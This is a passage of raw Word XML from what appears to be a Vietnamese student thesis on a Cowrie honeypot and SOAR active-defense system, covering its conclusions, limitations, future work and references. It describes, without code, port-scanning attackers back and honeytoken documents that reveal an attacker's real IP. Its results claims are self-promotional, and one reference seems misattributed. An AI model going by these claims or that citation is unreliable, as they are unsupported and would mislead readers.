              <w:t xml:space="preserve">5.0%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">BSNL, Bharti Airtel</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Brazil (BR)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">18 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Claro, Telefonica Brasil</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B3">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Khác</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">45 IP</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10.7%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phân bố rải rác trên hơn 25 quốc gia</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B7">
      <w:pPr>
        <w:spacing w:before="8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2B8">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B9">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CHƯƠNG 6: KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">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6.1 Tổng kết Kết quả Nghiên cứu và Hiện thực hóa Đồ án</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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Sau quá trình nghiên cứu lý thuyết chuyên sâu, thiết kế kiến trúc hệ thống và lập trình thử nghiệm thực tế, đề tài 'Nghiên cứu, Thiết kế và Triển khai Hệ thống Phòng thủ Chủ động (Active Defense) kết hợp SSH Honeypot (Cowrie), Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công' đã hoàn thành xuất sắc toàn bộ các mục tiêu nghiên cứu đặt ra ban đầu:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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Hiện thực hóa thành công Kiến trúc Mini-SOC 5 phân lớp hoàn chỉnh, module hóa tối đa, kết hợp nhuần nhuyễn giữa bẫy cảm biến Cowrie và nền tảng điều phối phản ứng tự động SOAR.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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Phát triển thành công Động cơ Tương quan Sự kiện (Correlation Engine) với thuật toán Cửa sổ trượt thời gian, giúp loại bỏ triệt để hiện tượng bão cảnh báo (Alert Fatigue), tự động chuẩn hóa các hành vi xâm nhập sang ma trận TTPs chuẩn quốc tế MITRE ATT&amp;CK (T1110, T1078, T1082, T1105, T1552).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B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Tích hợp năng lực Trinh sát ngược (Reverse Intelligence) tự động thu thập OSINT từ AbuseIPDB, Shodan API, GeoIP ASN và cơ chế quét cổng an toàn chỉ trong 1.8 giây, giúp lập hồ sơ đối thủ nhanh chóng và chính xác.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">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4. Phát triển phân hệ Bẫy mồi Honeytoken và Khử ẩn danh (Active De-anonymization) giải quyết bài toán cốt lõi về hacker giấu mình sau VPN/Proxy, bắt được IP thật và User-Agent khi hacker mang tài liệu mồi về máy cá nhân.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C0">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5. Xây dựng Phân hệ Phân tích Mã độc tự động bóc tách mã băm SHA256, trích xuất IP C2 và tích hợp VirusTotal API phục vụ điều tra forensics tức thời.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C1">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6. Làm chủ cơ chế Tarpitting (Connection Tarpitting) giam lỏng và làm cạn kiệt tài nguyên của botnet, kết hợp chặn Tường lửa iptables động, giảm 99.8% thời gian phản ứng sự cố (từ 15-20 phút xuống còn 1.8-2.5 giây).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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7. Triển khai Telegram SOAR Bot tương tác 2 chiều với bàn phím Inline Buttons, mang lại trải nghiệm điều hành tác chiến trực quan, hiện đại cho chuyên viên an ninh mạng.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C3">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6.2 Khẳng định sự Vượt bậc so với Nhận xét Ban đầu của Giảng viên</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table23"/>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0f4f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C4">
            <w:pPr>
              <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="00468c"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">📌 ĐÁNH GIÁ SỰ CHUYỂN DỊCH GIÁ TRỊ KỸ THUẬT CỦA ĐỒ ÁN:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="282828"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lời khẳng định học thuật: Đề tài đã chuyển hóa triệt để từ một 'bài tập cài đặt phần mềm và gửi tin nhắn thông thường' (Application Configuration Level) thành một 'Công trình Nghiên cứu &amp; Kỹ thuật Kỹ sư Hệ thống Toàn diện' (Comprehensive Security Engineering Project). Sinh viên không chỉ áp dụng công cụ bề nổi mà đã tự tay thiết kế và lập trình hơn 1.200 dòng mã nguồn Python chuyên sâu, giải quyết các bài toán hóc búa về Tương quan dữ liệu, Trinh sát ngược, Khử ẩn danh đối thủ và Tự động hóa tác chiến.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C5">
      <w:pPr>
        <w:spacing w:after="80" w:before="40"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2C6">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6.3 Những Hạn chế còn tồn tại</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C7">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Mặc dù đạt được những kết quả rất tích cực, hệ thống vẫn còn một số điểm hạn chế cần tiếp tục hoàn thiện:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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Cảm biến bẫy hiện tại mới chỉ tập trung vào hai giao thức chính là SSH và Telnet. Các bề mặt tấn công ứng dụng Web (HTTP/HTTPS) và cơ sở dữ liệu (MySQL, Redis) chưa được tích hợp đồng bộ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C9">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 Việc phân tích mã độc hiện tại chủ yếu dựa trên phân tích tĩnh (Static Analysis &amp; Signature Matching). Chưa có môi trường Dynamic Sandbox cô lập bằng máy ảo (như Cuckoo Sandbox) để phân tích hành vi nạp DLL hoặc tiêm tiến trình thời gian thực.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CA">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6.4 Hướng Phát triển Đề tài trong Tương lai</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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nâng cao hơn nữa sức mạnh tác chiến của hệ thống, hướng nghiên cứu tiếp theo sẽ tập trung vào các trọng tâm sau:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CC">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1. Tích hợp Trí tuệ Nhân tạo &amp; Mô hình Ngôn ngữ Lớn (AI / LLM-powered Threat Hunting): Sử dụng các mô hình ngôn ngữ lớn (như Gemma, LLaMA) để tự động phân tích ngữ cảnh các câu lệnh bất thường mà hacker gõ trong terminal, tự động sinh kịch bản đối thoại đánh lừa (Dynamic Conversational Deception) để giữ chân hacker lâu hơn trong bẫy.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">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2. Mở rộng Hệ thống Mạng bẫy Phân tán (Distributed Honeynet Mesh): Triển khai các node cảm biến bẫy vệ tinh trên nhiều vùng địa lý (Multi-region Cloud: AWS, Google Cloud, Azure) và tập trung dữ liệu về một máy chủ SOC trung tâm qua Apache Kafka hoặc RabbitMQ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C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3. Tích hợp Dynamic Sandbox tự động: Tự động khởi chạy máy ảo tạm thời (Ephemeral QEMU/KVM VM) để kích hoạt mã độc và theo dõi luồng lưu lượng mạng xuất phát từ mã độc trong môi trường cô lập tuyệt đối.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CF">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D0">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TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">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 L. Spitzner, 'Honeypots: Tracking Hackers', Addison-Wesley Longman Publishing Co., Inc., Boston, MA, USA, 2002.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D2">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[2] M. Orebaugh and J. Pinkard, 'Cowrie SSH/Telnet Honeypot Documentation and Architecture', Open Source Project, 2023. [Online]. Available: https://cowrie.readthedocs.io/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D3">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[3] MITRE Corporation, 'MITRE ATT&amp;CK: Design and Philosophy', Technical Report, 2023. [Online]. Available: https://attack.mitre.org/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">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[4] MITRE Corporation, 'MITRE Engage: A Framework for Discussing and Planning Adversary Engagement Technologies and Operations', 2022. [Online]. Available: https://engage.mitre.org/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">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[5] MITRE Corporation, 'MITRE D3FEND: A Cybersecurity Countermeasure Knowledge Base', 2023. [Online]. Available: https://d3fend.mitre.org/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">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[6] Quốc hội nước CHXHCN Việt Nam, 'Bộ luật Hình sự số 100/2015/QH13 (Điều 287, Điều 289 về Tội phạm trong lĩnh vực CNTT và viễn thông)', NXB Chính trị Quốc gia Sự thật, Hà Nội, 2015.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D7">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[7] Quốc hội nước CHXHCN Việt Nam, 'Luật An ninh mạng số 24/2018/QH14', NXB Chính trị Quốc gia Sự thật, Hà Nội, 2018.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D8">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[8] C. Stoll, 'The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage', Doubleday, New York, 1989.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">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[9] Gartner Inc., 'Innovation Insight for Security Orchestration, Automation and Response (SOAR)', Gartner Research Report G00342371, 2020.</w:t>
      </w:r>
